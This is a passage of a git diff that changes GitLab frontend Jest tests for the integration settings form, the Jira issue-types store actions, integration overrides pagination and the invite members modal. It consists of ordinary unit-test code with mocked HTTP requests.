'helpers/fixtures'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; - import { mockIntegrationProps } from 'jest/integrations/edit/mock_data'; import ActiveCheckbox from '~/integrations/edit/components/active_checkbox.vue'; import ConfirmationModal from '~/integrations/edit/components/confirmation_modal.vue'; @@ -11,11 +13,27 @@ import JiraTriggerFields from '~/integrations/edit/components/jira_trigger_field import OverrideDropdown from '~/integrations/edit/components/override_dropdown.vue'; import ResetConfirmationModal from '~/integrations/edit/components/reset_confirmation_modal.vue'; import TriggerFields from '~/integrations/edit/components/trigger_fields.vue'; -import { integrationLevels } from '~/integrations/constants'; +import waitForPromises from 'helpers/wait_for_promises'; +import { + integrationLevels, + I18N_SUCCESSFUL_CONNECTION_MESSAGE, + VALIDATE_INTEGRATION_FORM_EVENT, + I18N_DEFAULT_ERROR_MESSAGE, +} from '~/integrations/constants'; import { createStore } from '~/integrations/edit/store'; +import eventHub from '~/integrations/edit/event_hub'; +import httpStatus from '~/lib/utils/http_status'; + +jest.mock('~/integrations/edit/event_hub'); +jest.mock('@sentry/browser'); describe('IntegrationForm', () => { + const mockToastShow = jest.fn(); + let wrapper; + let dispatch; + let mockAxios; + let mockForm; const createComponent = ({ customStateProps = {}, @@ -23,12 +41,18 @@ describe('IntegrationForm', () => { initialState = {}, props = {}, } = {}) => { + const store = createStore({ + customState: { ...mockIntegrationProps, ...customStateProps }, + ...initialState, + }); + dispatch = jest.spyOn(store, 'dispatch').mockImplementation(); + wrapper = shallowMountExtended(IntegrationForm, { - propsData: { ...props }, - store: createStore({ - customState: { ...mockIntegrationProps, ...customStateProps }, - ...initialState, - }), + propsData: { ...props, formSelector: '.test' }, + provide: { + glFeatures: featureFlags, + }, + store, 
stubs: { OverrideDropdown, ActiveCheckbox, @@ -36,46 +60,42 @@ describe('IntegrationForm', () => { JiraTriggerFields, TriggerFields, }, - provide: { - glFeatures: featureFlags, + mocks: { + $toast: { + show: mockToastShow, + }, }, }); }; - afterEach(() => { - wrapper.destroy(); - }); + const createForm = ({ isValid = true } = {}) => { + mockForm = document.createElement('form'); + jest.spyOn(document, 'querySelector').mockReturnValue(mockForm); + jest.spyOn(mockForm, 'checkValidity').mockReturnValue(isValid); + jest.spyOn(mockForm, 'submit'); + }; const findOverrideDropdown = () => wrapper.findComponent(OverrideDropdown); const findActiveCheckbox = () => wrapper.findComponent(ActiveCheckbox); const findConfirmationModal = () => wrapper.findComponent(ConfirmationModal); const findResetConfirmationModal = () => wrapper.findComponent(ResetConfirmationModal); const findResetButton = () => wrapper.findByTestId('reset-button'); + const findSaveButton = () => wrapper.findByTestId('save-button'); + const findTestButton = () => wrapper.findByTestId('test-button'); const findJiraTriggerFields = () => wrapper.findComponent(JiraTriggerFields); const findJiraIssuesFields = () => wrapper.findComponent(JiraIssuesFields); const findTriggerFields = () => wrapper.findComponent(TriggerFields); - describe('template', () => { - describe('showActive is true', () => { - it('renders ActiveCheckbox', () => { - createComponent(); - - expect(findActiveCheckbox().exists()).toBe(true); - }); - }); - - describe('showActive is false', () => { - it('does not render ActiveCheckbox', () => { - createComponent({ - customStateProps: { - showActive: false, - }, - }); + beforeEach(() => { + mockAxios = new MockAdapter(axios); + }); - expect(findActiveCheckbox().exists()).toBe(false); - }); - }); + afterEach(() => { + wrapper.destroy(); + mockAxios.restore(); + }); + describe('template', () => { describe('integrationLevel is instance', () => { it('renders ConfirmationModal', () => { createComponent({ @@ 
-195,13 +215,29 @@ describe('IntegrationForm', () => { }); describe('type is "jira"', () => { - it('renders JiraTriggerFields', () => { + beforeEach(() => { + jest.spyOn(document, 'querySelector').mockReturnValue(document.createElement('form')); + createComponent({ - customStateProps: { type: 'jira' }, + customStateProps: { type: 'jira', testPath: '/test' }, }); + }); + it('renders JiraTriggerFields', () => { expect(findJiraTriggerFields().exists()).toBe(true); }); + + it('renders JiraIssuesFields', () => { + expect(findJiraIssuesFields().exists()).toBe(true); + }); + + describe('when JiraIssueFields emits `request-jira-issue-types` event', () => { + it('dispatches `requestJiraIssueTypes` action', () => { + findJiraIssuesFields().vm.$emit('request-jira-issue-types'); + + expect(dispatch).toHaveBeenCalledWith('requestJiraIssueTypes', expect.any(FormData)); + }); + }); }); describe('triggerEvents is present', () => { @@ -303,4 +339,210 @@ describe('IntegrationForm', () => { }); }); }); + + describe('ActiveCheckbox', () => { + describe.each` + showActive + ${true} + ${false} + `('when `showActive` is $showActive', ({ showActive }) => { + it(`${showActive ? 
'renders' : 'does not render'} ActiveCheckbox`, () => { + createComponent({ + customStateProps: { + showActive, + }, + }); + + expect(findActiveCheckbox().exists()).toBe(showActive); + }); + }); + + describe.each` + formActive | novalidate + ${true} | ${null} + ${false} | ${'true'} + `( + 'when `toggle-integration-active` is emitted with $formActive', + ({ formActive, novalidate }) => { + beforeEach(async () => { + createForm(); + createComponent({ + customStateProps: { + showActive: true, + initialActivated: false, + }, + }); + + await findActiveCheckbox().vm.$emit('toggle-integration-active', formActive); + }); + + it(`sets noValidate to ${novalidate}`, () => { + expect(mockForm.getAttribute('novalidate')).toBe(novalidate); + }); + }, + ); + }); + + describe('when `save` button is clicked', () => { + describe('buttons', () => { + beforeEach(async () => { + createForm(); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + initialActivated: true, + }, + }); + + await findSaveButton().vm.$emit('click', new Event('click')); + }); + + it('sets save button `loading` prop to `true`', () => { + expect(findSaveButton().props('loading')).toBe(true); + }); + + it('sets test button `disabled` prop to `true`', () => { + expect(findTestButton().props('disabled')).toBe(true); + }); + }); + + describe.each` + checkValidityReturn | integrationActive + ${true} | ${false} + ${true} | ${true} + ${false} | ${false} + `( + 'when form is valid (checkValidity returns $checkValidityReturn and integrationActive is $integrationActive)', + ({ integrationActive, checkValidityReturn }) => { + beforeEach(async () => { + createForm({ isValid: checkValidityReturn }); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + initialActivated: integrationActive, + }, + }); + + await findSaveButton().vm.$emit('click', new Event('click')); + }); + + it('submit form', () => { + expect(mockForm.submit).toHaveBeenCalledTimes(1); + }); + }, + ); + + 
describe('when form is invalid (checkValidity returns false and integrationActive is true)', () => { + beforeEach(async () => { + createForm({ isValid: false }); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + initialActivated: true, + }, + }); + + await findSaveButton().vm.$emit('click', new Event('click')); + }); + + it('does not submit form', () => { + expect(mockForm.submit).not.toHaveBeenCalled(); + }); + + it('sets save button `loading` prop to `false`', () => { + expect(findSaveButton().props('loading')).toBe(false); + }); + + it('sets test button `disabled` prop to `false`', () => { + expect(findTestButton().props('disabled')).toBe(false); + }); + + it('emits `VALIDATE_INTEGRATION_FORM_EVENT`', () => { + expect(eventHub.$emit).toHaveBeenCalledWith(VALIDATE_INTEGRATION_FORM_EVENT); + }); + }); + }); + + describe('when `test` button is clicked', () => { + describe('when form is invalid', () => { + it('emits `VALIDATE_INTEGRATION_FORM_EVENT` event to the event hub', () => { + createForm({ isValid: false }); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + }, + }); + + findTestButton().vm.$emit('click', new Event('click')); + + expect(eventHub.$emit).toHaveBeenCalledWith(VALIDATE_INTEGRATION_FORM_EVENT); + }); + }); + + describe('when form is valid', () => { + const mockTestPath = '/test'; + + beforeEach(() => { + createForm({ isValid: true }); + createComponent({ + customStateProps: { + showActive: true, + canTest: true, + testPath: mockTestPath, + }, + }); + }); + + describe('buttons', () => { + beforeEach(async () => { + await findTestButton().vm.$emit('click', new Event('click')); + }); + + it('sets test button `loading` prop to `true`', () => { + expect(findTestButton().props('loading')).toBe(true); + }); + + it('sets save button `disabled` prop to `true`', () => { + expect(findSaveButton().props('disabled')).toBe(true); + }); + }); + + describe.each` + scenario | replyStatus | errorMessage | 
expectToast | expectSentry + ${'when "test settings" request fails'} | ${httpStatus.INTERNAL_SERVER_ERROR} | ${undefined} | ${I18N_DEFAULT_ERROR_MESSAGE} | ${true} + ${'when "test settings" returns an error'} | ${httpStatus.OK} | ${'an error'} | ${'an error'} | ${false} + ${'when "test settings" succeeds'} | ${httpStatus.OK} | ${undefined} | ${I18N_SUCCESSFUL_CONNECTION_MESSAGE} | ${false} + `('$scenario', ({ replyStatus, errorMessage, expectToast, expectSentry }) => { + beforeEach(async () => { + mockAxios.onPut(mockTestPath).replyOnce(replyStatus, { + error: Boolean(errorMessage), + message: errorMessage, + }); + + await findTestButton().vm.$emit('click', new Event('click')); + await waitForPromises(); + }); + + it(`calls toast with '${expectToast}'`, () => { + expect(mockToastShow).toHaveBeenCalledWith(expectToast); + }); + + it('sets `loading` prop of test button to `false`', () => { + expect(findTestButton().props('loading')).toBe(false); + }); + + it('sets save button `disabled` prop to `false`', () => { + expect(findSaveButton().props('disabled')).toBe(false); + }); + + it(`${expectSentry ? 'does' : 'does not'} capture exception in Sentry`, () => { + expect(Sentry.captureException).toHaveBeenCalledTimes(expectSentry ? 
1 : 0); + }); + }); + }); + }); }); diff --git a/spec/frontend/integrations/edit/components/jira_issues_fields_spec.js b/spec/frontend/integrations/edit/components/jira_issues_fields_spec.js index 3a664b652ac..b5a8eed3598 100644 --- a/spec/frontend/integrations/edit/components/jira_issues_fields_spec.js +++ b/spec/frontend/integrations/edit/components/jira_issues_fields_spec.js @@ -1,10 +1,7 @@ import { GlFormCheckbox, GlFormInput } from '@gitlab/ui'; import { mountExtended, shallowMountExtended } from 'helpers/vue_test_utils_helper'; -import { - GET_JIRA_ISSUE_TYPES_EVENT, - VALIDATE_INTEGRATION_FORM_EVENT, -} from '~/integrations/constants'; +import { VALIDATE_INTEGRATION_FORM_EVENT } from '~/integrations/constants'; import JiraIssuesFields from '~/integrations/edit/components/jira_issues_fields.vue'; import eventHub from '~/integrations/edit/event_hub'; import { createStore } from '~/integrations/edit/store'; @@ -216,13 +213,11 @@ describe('JiraIssuesFields', () => { ); }); - it('emits "getJiraIssueTypes" to the eventHub when the jira-vulnerabilities component requests to fetch issue types', async () => { - const eventHubEmitSpy = jest.spyOn(eventHub, '$emit'); - + it('emits "request-jira-issue-types` when the jira-vulnerabilities component requests to fetch issue types', async () => { await setEnableCheckbox(true); - await findJiraForVulnerabilities().vm.$emit('request-get-issue-types'); + await findJiraForVulnerabilities().vm.$emit('request-jira-issue-types'); - expect(eventHubEmitSpy).toHaveBeenCalledWith(GET_JIRA_ISSUE_TYPES_EVENT); + expect(wrapper.emitted('request-jira-issue-types')).toHaveLength(1); }); }); diff --git a/spec/frontend/integrations/edit/mock_data.js b/spec/frontend/integrations/edit/mock_data.js index 27ba0768331..3c45ed0fb1b 100644 --- a/spec/frontend/integrations/edit/mock_data.js +++ b/spec/frontend/integrations/edit/mock_data.js @@ -14,3 +14,9 @@ export const mockIntegrationProps = { type: '', inheritFromId: 25, }; + +export const 
mockJiraIssueTypes = [ + { id: '1', name: 'issue', description: 'issue' }, + { id: '2', name: 'bug', description: 'bug' }, + { id: '3', name: 'epic', description: 'epic' }, +]; diff --git a/spec/frontend/integrations/edit/store/actions_spec.js b/spec/frontend/integrations/edit/store/actions_spec.js index e2f4c138ece..b413de2b286 100644 --- a/spec/frontend/integrations/edit/store/actions_spec.js +++ b/spec/frontend/integrations/edit/store/actions_spec.js @@ -1,8 +1,9 @@ +import axios from 'axios'; +import MockAdapter from 'axios-mock-adapter'; import testAction from 'helpers/vuex_action_helper'; +import { I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE } from '~/integrations/constants'; import { setOverride, - setIsSaving, - setIsTesting, setIsResetting, requestResetIntegration, receiveResetIntegrationSuccess, @@ -14,14 +15,21 @@ import { import * as types from '~/integrations/edit/store/mutation_types'; import createState from '~/integrations/edit/store/state'; import { refreshCurrentPage } from '~/lib/utils/url_utility'; +import { mockJiraIssueTypes } from '../mock_data'; jest.mock('~/lib/utils/url_utility'); describe('Integration form store actions', () => { let state; + let mockAxios; beforeEach(() => { state = createState(); + mockAxios = new MockAdapter(axios); + }); + + afterEach(() => { + mockAxios.restore(); }); describe('setOverride', () => { @@ -30,18 +38,6 @@ describe('Integration form store actions', () => { }); }); - describe('setIsSaving', () => { - it('should commit isSaving mutation', () => { - return testAction(setIsSaving, true, state, [{ type: types.SET_IS_SAVING, payload: true }]); - }); - }); - - describe('setIsTesting', () => { - it('should commit isTesting mutation', () => { - return testAction(setIsTesting, true, state, [{ type: types.SET_IS_TESTING, payload: true }]); - }); - }); - describe('setIsResetting', () => { it('should commit isResetting mutation', () => { return testAction(setIsResetting, true, state, [ @@ -75,11 +71,28 @@ 
describe('Integration form store actions', () => { }); describe('requestJiraIssueTypes', () => { - it('should commit SET_JIRA_ISSUE_TYPES_ERROR_MESSAGE and SET_IS_LOADING_JIRA_ISSUE_TYPES mutations', () => { - return testAction(requestJiraIssueTypes, null, state, [ - { type: types.SET_JIRA_ISSUE_TYPES_ERROR_MESSAGE, payload: '' }, - { type: types.SET_IS_LOADING_JIRA_ISSUE_TYPES, payload: true }, - ]); + describe.each` + scenario | responseCode | response | action + ${'when successful'} | ${200} | ${{ issuetypes: mockJiraIssueTypes }} | ${{ type: 'receiveJiraIssueTypesSuccess', payload: mockJiraIssueTypes }} + ${'when response has no issue types'} | ${200} | ${{ issuetypes: [] }} | ${{ type: 'receiveJiraIssueTypesError', payload: I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE }} + ${'when response includes error'} | ${200} | ${{ error: new Error() }} | ${{ type: 'receiveJiraIssueTypesError', payload: I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE }} + ${'when error occurs'} | ${500} | ${{}} | ${{ type: 'receiveJiraIssueTypesError', payload: expect.any(String) }} + `('$scenario', ({ responseCode, response, action }) => { + it(`should commit SET_JIRA_ISSUE_TYPES_ERROR_MESSAGE and SET_IS_LOADING_JIRA_ISSUE_TYPES mutations, and dispatch ${action.type}`, () => { + mockAxios.onPut('/test').replyOnce(responseCode, response); + + return testAction( + requestJiraIssueTypes, + new FormData(), + { propsSource: { testPath: '/test' } }, + [ + // should clear the error messages and set the loading state + { type: types.SET_JIRA_ISSUE_TYPES_ERROR_MESSAGE, payload: '' }, + { type: types.SET_IS_LOADING_JIRA_ISSUE_TYPES, payload: true }, + ], + [action], + ); + }); }); }); diff --git a/spec/frontend/integrations/edit/store/getters_spec.js b/spec/frontend/integrations/edit/store/getters_spec.js index ad7a887dff2..3353e0c84cc 100644 --- a/spec/frontend/integrations/edit/store/getters_spec.js +++ b/spec/frontend/integrations/edit/store/getters_spec.js @@ -1,11 +1,4 @@ -import { - 
currentKey, - isInheriting, - isDisabled, - propsSource, -} from '~/integrations/edit/store/getters'; -import * as types from '~/integrations/edit/store/mutation_types'; -import mutations from '~/integrations/edit/store/mutations'; +import { currentKey, isInheriting, propsSource } from '~/integrations/edit/store/getters'; import createState from '~/integrations/edit/store/state'; import { mockIntegrationProps } from '../mock_data'; @@ -52,29 +45,6 @@ describe('Integration form store getters', () => { }); }); - describe('isDisabled', () => { - it.each` - isSaving | isTesting | isResetting | expected - ${false} | ${false} | ${false} | ${false} - ${true} | ${false} | ${false} | ${true} - ${false} | ${true} | ${false} | ${true} - ${false} | ${false} | ${true} | ${true} - ${false} | ${true} | ${true} | ${true} - ${true} | ${false} | ${true} | ${true} - ${true} | ${true} | ${false} | ${true} - ${true} | ${true} | ${true} | ${true} - `( - 'when isSaving = $isSaving, isTesting = $isTesting, isResetting = $isResetting then isDisabled = $expected', - ({ isSaving, isTesting, isResetting, expected }) => { - mutations[types.SET_IS_SAVING](state, isSaving); - mutations[types.SET_IS_TESTING](state, isTesting); - mutations[types.SET_IS_RESETTING](state, isResetting); - - expect(isDisabled(state)).toBe(expected); - }, - ); - }); - describe('propsSource', () => { beforeEach(() => { state.defaultState = defaultState; diff --git a/spec/frontend/integrations/edit/store/mutations_spec.js b/spec/frontend/integrations/edit/store/mutations_spec.js index 18faa2f6bba..641547550d1 100644 --- a/spec/frontend/integrations/edit/store/mutations_spec.js +++ b/spec/frontend/integrations/edit/store/mutations_spec.js @@ -17,22 +17,6 @@ describe('Integration form store mutations', () => { }); }); - describe(`${types.SET_IS_SAVING}`, () => { - it('sets isSaving', () => { - mutations[types.SET_IS_SAVING](state, true); - - expect(state.isSaving).toBe(true); - }); - }); - - 
describe(`${types.SET_IS_TESTING}`, () => { - it('sets isTesting', () => { - mutations[types.SET_IS_TESTING](state, true); - - expect(state.isTesting).toBe(true); - }); - }); - describe(`${types.SET_IS_RESETTING}`, () => { it('sets isResetting', () => { mutations[types.SET_IS_RESETTING](state, true); diff --git a/spec/frontend/integrations/edit/store/state_spec.js b/spec/frontend/integrations/edit/store/state_spec.js index 6cd84836395..5582be7fd3c 100644 --- a/spec/frontend/integrations/edit/store/state_spec.js +++ b/spec/frontend/integrations/edit/store/state_spec.js @@ -6,7 +6,6 @@ describe('Integration form state factory', () => { defaultState: null, customState: {}, isSaving: false, - isTesting: false, isResetting: false, override: false, isLoadingJiraIssueTypes: false, diff --git a/spec/frontend/integrations/integration_settings_form_spec.js b/spec/frontend/integrations/integration_settings_form_spec.js deleted file mode 100644 index c35d178e518..00000000000 --- a/spec/frontend/integrations/integration_settings_form_spec.js +++ /dev/null @@ -1,248 +0,0 @@ -import MockAdaptor from 'axios-mock-adapter'; -import IntegrationSettingsForm from '~/integrations/integration_settings_form'; -import eventHub from '~/integrations/edit/event_hub'; -import axios from '~/lib/utils/axios_utils'; -import toast from '~/vue_shared/plugins/global_toast'; -import { - I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE, - I18N_SUCCESSFUL_CONNECTION_MESSAGE, - I18N_DEFAULT_ERROR_MESSAGE, - GET_JIRA_ISSUE_TYPES_EVENT, - TOGGLE_INTEGRATION_EVENT, - TEST_INTEGRATION_EVENT, - SAVE_INTEGRATION_EVENT, -} from '~/integrations/constants'; -import waitForPromises from 'helpers/wait_for_promises'; - -jest.mock('~/vue_shared/plugins/global_toast'); -jest.mock('lodash/delay', () => (callback) => callback()); - -const FIXTURE = 'services/edit_service.html'; - -describe('IntegrationSettingsForm', () => { - let integrationSettingsForm; - - const mockStoreDispatch = () => 
jest.spyOn(integrationSettingsForm.vue.$store, 'dispatch'); - - beforeEach(() => { - loadFixtures(FIXTURE); - - integrationSettingsForm = new IntegrationSettingsForm('.js-integration-settings-form'); - integrationSettingsForm.init(); - }); - - describe('constructor', () => { - it('should initialize form element refs on class object', () => { - expect(integrationSettingsForm.$form).toBeDefined(); - expect(integrationSettingsForm.$form.nodeName).toBe('FORM'); - expect(integrationSettingsForm.formActive).toBeDefined(); - }); - - it('should initialize form metadata on class object', () => { - expect(integrationSettingsForm.testEndPoint).toBeDefined(); - }); - }); - - describe('event handling', () => { - let mockAxios; - - beforeEach(() => { - mockAxios = new MockAdaptor(axios); - jest.spyOn(axios, 'put'); - }); - - afterEach(() => { - mockAxios.restore(); - eventHub.dispose(); // clear event hub handlers - }); - - describe('when event hub receives `TOGGLE_INTEGRATION_EVENT`', () => { - it('should remove `novalidate` attribute to form when called with `true`', () => { - eventHub.$emit(TOGGLE_INTEGRATION_EVENT, true); - - expect(integrationSettingsForm.$form.getAttribute('novalidate')).toBe(null); - }); - - it('should set `novalidate` attribute to form when called with `false`', () => { - eventHub.$emit(TOGGLE_INTEGRATION_EVENT, false); - - expect(integrationSettingsForm.$form.getAttribute('novalidate')).toBe('novalidate'); - }); - }); - - describe('when event hub receives `TEST_INTEGRATION_EVENT`', () => { - describe('when form is valid', () => { - beforeEach(() => { - jest.spyOn(integrationSettingsForm.$form, 'checkValidity').mockReturnValue(true); - }); - - it('should make an ajax request with provided `formData`', async () => { - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(axios.put).toHaveBeenCalledWith( - integrationSettingsForm.testEndPoint, - new FormData(integrationSettingsForm.$form), - ); - }); - - it('should show success 
message if test is successful', async () => { - jest.spyOn(integrationSettingsForm.$form, 'submit').mockImplementation(() => {}); - - mockAxios.onPut(integrationSettingsForm.testEndPoint).reply(200, { - error: false, - }); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(toast).toHaveBeenCalledWith(I18N_SUCCESSFUL_CONNECTION_MESSAGE); - }); - - it('should show error message if ajax request responds with test error', async () => { - const errorMessage = 'Test failed.'; - const serviceResponse = 'some error'; - - mockAxios.onPut(integrationSettingsForm.testEndPoint).reply(200, { - error: true, - message: errorMessage, - service_response: serviceResponse, - test_failed: false, - }); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(toast).toHaveBeenCalledWith(`${errorMessage} ${serviceResponse}`); - }); - - it('should show error message if ajax request failed', async () => { - mockAxios.onPut(integrationSettingsForm.testEndPoint).networkError(); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(toast).toHaveBeenCalledWith(I18N_DEFAULT_ERROR_MESSAGE); - }); - - it('should always dispatch `setIsTesting` with `false` once request is completed', async () => { - const dispatchSpy = mockStoreDispatch(); - mockAxios.onPut(integrationSettingsForm.testEndPoint).networkError(); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith('setIsTesting', false); - }); - }); - - describe('when form is invalid', () => { - beforeEach(() => { - jest.spyOn(integrationSettingsForm.$form, 'checkValidity').mockReturnValue(false); - jest.spyOn(integrationSettingsForm, 'testSettings'); - }); - - it('should dispatch `setIsTesting` with `false` and not call `testSettings`', async () => { - const dispatchSpy = mockStoreDispatch(); - - eventHub.$emit(TEST_INTEGRATION_EVENT); - await waitForPromises(); - - 
expect(dispatchSpy).toHaveBeenCalledWith('setIsTesting', false); - expect(integrationSettingsForm.testSettings).not.toHaveBeenCalled(); - }); - }); - }); - - describe('when event hub receives `GET_JIRA_ISSUE_TYPES_EVENT`', () => { - it('should always dispatch `requestJiraIssueTypes`', () => { - const dispatchSpy = mockStoreDispatch(); - mockAxios.onPut(integrationSettingsForm.testEndPoint).networkError(); - - eventHub.$emit(GET_JIRA_ISSUE_TYPES_EVENT); - - expect(dispatchSpy).toHaveBeenCalledWith('requestJiraIssueTypes'); - }); - - it('should make an ajax request with provided `formData`', () => { - eventHub.$emit(GET_JIRA_ISSUE_TYPES_EVENT); - - expect(axios.put).toHaveBeenCalledWith( - integrationSettingsForm.testEndPoint, - new FormData(integrationSettingsForm.$form), - ); - }); - - it('should dispatch `receiveJiraIssueTypesSuccess` with the correct payload if ajax request is successful', async () => { - const dispatchSpy = mockStoreDispatch(); - const mockData = ['ISSUE', 'EPIC']; - mockAxios.onPut(integrationSettingsForm.testEndPoint).reply(200, { - error: false, - issuetypes: mockData, - }); - - eventHub.$emit(GET_JIRA_ISSUE_TYPES_EVENT); - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith('receiveJiraIssueTypesSuccess', mockData); - }); - - it.each(['Custom error message here', undefined])( - 'should dispatch "receiveJiraIssueTypesError" with a message if the backend responds with error', - async (responseErrorMessage) => { - const dispatchSpy = mockStoreDispatch(); - - const expectedErrorMessage = - responseErrorMessage || I18N_FETCH_TEST_SETTINGS_DEFAULT_ERROR_MESSAGE; - mockAxios.onPut(integrationSettingsForm.testEndPoint).reply(200, { - error: true, - message: responseErrorMessage, - }); - - eventHub.$emit(GET_JIRA_ISSUE_TYPES_EVENT); - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith( - 'receiveJiraIssueTypesError', - expectedErrorMessage, - ); - }, - ); - }); - - describe('when event hub receives 
`SAVE_INTEGRATION_EVENT`', () => { - describe('when form is valid', () => { - beforeEach(() => { - jest.spyOn(integrationSettingsForm.$form, 'checkValidity').mockReturnValue(true); - jest.spyOn(integrationSettingsForm.$form, 'submit'); - }); - - it('should submit the form', async () => { - eventHub.$emit(SAVE_INTEGRATION_EVENT); - await waitForPromises(); - - expect(integrationSettingsForm.$form.submit).toHaveBeenCalled(); - expect(integrationSettingsForm.$form.submit).toHaveBeenCalledTimes(1); - }); - }); - - describe('when form is invalid', () => { - beforeEach(() => { - jest.spyOn(integrationSettingsForm.$form, 'checkValidity').mockReturnValue(false); - jest.spyOn(integrationSettingsForm.$form, 'submit'); - }); - - it('should dispatch `setIsSaving` with `false` and not submit form', async () => { - const dispatchSpy = mockStoreDispatch(); - - eventHub.$emit(SAVE_INTEGRATION_EVENT); - - await waitForPromises(); - - expect(dispatchSpy).toHaveBeenCalledWith('setIsSaving', false); - expect(integrationSettingsForm.$form.submit).not.toHaveBeenCalled(); - }); - }); - }); - }); -}); diff --git a/spec/frontend/integrations/overrides/components/integration_overrides_spec.js b/spec/frontend/integrations/overrides/components/integration_overrides_spec.js index ae89d05cead..8abd83887f7 100644 --- a/spec/frontend/integrations/overrides/components/integration_overrides_spec.js +++ b/spec/frontend/integrations/overrides/components/integration_overrides_spec.js @@ -8,6 +8,7 @@ import IntegrationOverrides from '~/integrations/overrides/components/integratio import axios from '~/lib/utils/axios_utils'; import httpStatus from '~/lib/utils/http_status'; import ProjectAvatar from '~/vue_shared/components/project_avatar.vue'; +import UrlSync from '~/vue_shared/components/url_sync.vue'; const mockOverrides = Array(DEFAULT_PER_PAGE * 3) .fill(1) @@ -26,9 +27,10 @@ describe('IntegrationOverrides', () => { overridesPath: 'mock/overrides', }; - const createComponent = ({ mountFn = 
shallowMount } = {}) => { + const createComponent = ({ mountFn = shallowMount, stubs } = {}) => { wrapper = mountFn(IntegrationOverrides, { propsData: defaultProps, + stubs, }); }; @@ -127,27 +129,58 @@ describe('IntegrationOverrides', () => { }); describe('pagination', () => { - it('triggers fetch when `input` event is emitted', async () => { - createComponent(); - jest.spyOn(axios, 'get'); - await waitForPromises(); + describe('when total items does not exceed the page limit', () => { + it('does not render', async () => { + mockAxios.onGet(defaultProps.overridesPath).reply(httpStatus.OK, [mockOverrides[0]], { + 'X-TOTAL': DEFAULT_PER_PAGE - 1, + 'X-PAGE': 1, + }); + + createComponent(); + + // wait for initial load + await waitForPromises(); - await findPagination().vm.$emit('input', 2); - expect(axios.get).toHaveBeenCalledWith(defaultProps.overridesPath, { - params: { page: 2, per_page: DEFAULT_PER_PAGE }, + expect(findPagination().exists()).toBe(false); }); }); - it('does not render with <=1 page', async () => { - mockAxios.onGet(defaultProps.overridesPath).reply(httpStatus.OK, [mockOverrides[0]], { - 'X-TOTAL': 1, - 'X-PAGE': 1, + describe('when total items exceeds the page limit', () => { + const mockPage = 2; + + beforeEach(async () => { + createComponent({ stubs: { UrlSync } }); + mockAxios.onGet(defaultProps.overridesPath).reply(httpStatus.OK, [mockOverrides[0]], { + 'X-TOTAL': DEFAULT_PER_PAGE * 2, + 'X-PAGE': mockPage, + }); + + // wait for initial load + await waitForPromises(); }); - createComponent(); - await waitForPromises(); + it('renders', () => { + expect(findPagination().exists()).toBe(true); + }); - expect(findPagination().exists()).toBe(false); + describe('when navigating to a page', () => { + beforeEach(async () => { + jest.spyOn(axios, 'get'); + + // trigger a page change + await findPagination().vm.$emit('input', mockPage); + }); + + it('performs GET request with correct params', () => { + 
expect(axios.get).toHaveBeenCalledWith(defaultProps.overridesPath, { + params: { page: mockPage, per_page: DEFAULT_PER_PAGE }, + }); + }); + + it('updates `page` URL parameter', () => { + expect(window.location.search).toBe(`?page=${mockPage}`); + }); + }); }); }); }); diff --git a/spec/frontend/invite_members/components/invite_members_modal_spec.js b/spec/frontend/invite_members/components/invite_members_modal_spec.js index 5be79004640..e190ddf243e 100644 --- a/spec/frontend/invite_members/components/invite_members_modal_spec.js +++ b/spec/frontend/invite_members/components/invite_members_modal_spec.js @@ -6,7 +6,6 @@ import { GlSprintf, GlLink, GlModal, - GlFormCheckboxGroup, } from '@gitlab/ui'; import MockAdapter from 'axios-mock-adapter'; import { stubComponent } from 'helpers/stub_component'; @@ -18,8 +17,6 @@ import InviteMembersModal from '~/invite_members/components/invite_members_modal import ModalConfetti from '~/invite_members/components/confetti.vue'; import MembersTokenSelect from '~/invite_members/components/members_token_select.vue'; import { - INVITE_MEMBERS_IN_COMMENT, - MEMBER_AREAS_OF_FOCUS, INVITE_MEMBERS_FOR_TASK, CANCEL_BUTTON_TEXT, INVITE_BUTTON_TEXT, @@ -28,6 +25,7 @@ import { MEMBERS_MODAL_DEFAULT_TITLE, MEMBERS_PLACEHOLDER, MEMBERS_TO_PROJECT_CELEBRATE_INTRO_TEXT, + LEARN_GITLAB, } from '~/invite_members/constants'; import eventHub from '~/invite_members/event_hub'; import axios from '~/lib/utils/axios_utils'; @@ -51,12 +49,7 @@ const inviteeType = 'members'; const accessLevels = { Guest: 10, Reporter: 20, Developer: 30, Maintainer: 40, Owner: 50 }; const defaultAccessLevel = 10; const inviteSource = 'unknown'; -const noSelectionAreasOfFocus = ['no_selection']; const helpLink = 'https://example.com'; -const areasOfFocusOptions = [ - { text: 'area1', value: 'area1' }, - { text: 'area2', value: 'area2' }, -]; const tasksToBeDoneOptions = [ { text: 'First task', value: 'first' }, { text: 'Second task', value: 'second' }, @@ -95,9 +88,7 @@ 
